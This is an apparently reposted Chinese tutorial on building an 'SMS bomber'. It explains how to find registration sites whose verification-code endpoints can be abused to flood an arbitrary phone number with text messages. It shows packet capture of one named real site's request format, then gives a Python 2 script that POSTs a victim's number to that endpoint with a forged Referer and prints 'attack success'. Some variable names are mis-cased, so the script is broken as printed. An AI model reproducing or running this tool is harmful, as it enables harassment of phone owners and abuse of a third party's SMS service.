作者:谢乔云文辰雅婷 | 来源:互联网 | 2023-08-15 12:04
短信轰炸机的原理是利用一些用手机号注册且需要发送验证码的网站的漏洞,可以向任何人的手机号发送短信,当然短信内容,我们无法控制。所以主要工作还是寻找这样的网站,然后利用Fiddler或者HttpWatch分析请求,使用post还是get,数据格式是怎么样的等。
以http://topic.hongxiu.com/wap/为例:
然后随便填一个电话号码,进行抓包分析:
通过这个可以看出,请求方式是POST,点击webForms就可以看到发送的数据格式。
有了这些就很简单了,核心就是向服务器post数据
import httplib,urllib,sys,os,re,urllib2
import string
def attack(phone):
datas=""
url='http://topic.hongxiu.com/wap/action.aspx'
#请求的数据
payload={'hidtpye':'1',
'txtMobile':phone}
#注意Referer不能为空
i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Accept": "text/plain",'Referer':'http://topic.hongxiu.com/wap/'}
payload=urllib.urlencode(payload)
try:
request=urllib2.Request(url,payload,i_headers)
respOnse=urllib2.urlopen(request)
datas=response.read()
print datas
print 'attack success!!!'
except Exception, e:
print e
print "attack failed!!!"
if __name__=="__main__":
phOne=raw_input('input the phone:')
attack(phone)
源码地址:https://github.com/iloster/PythonScripts/blob/master/hongxiu.py
京公网安备 11010802041100号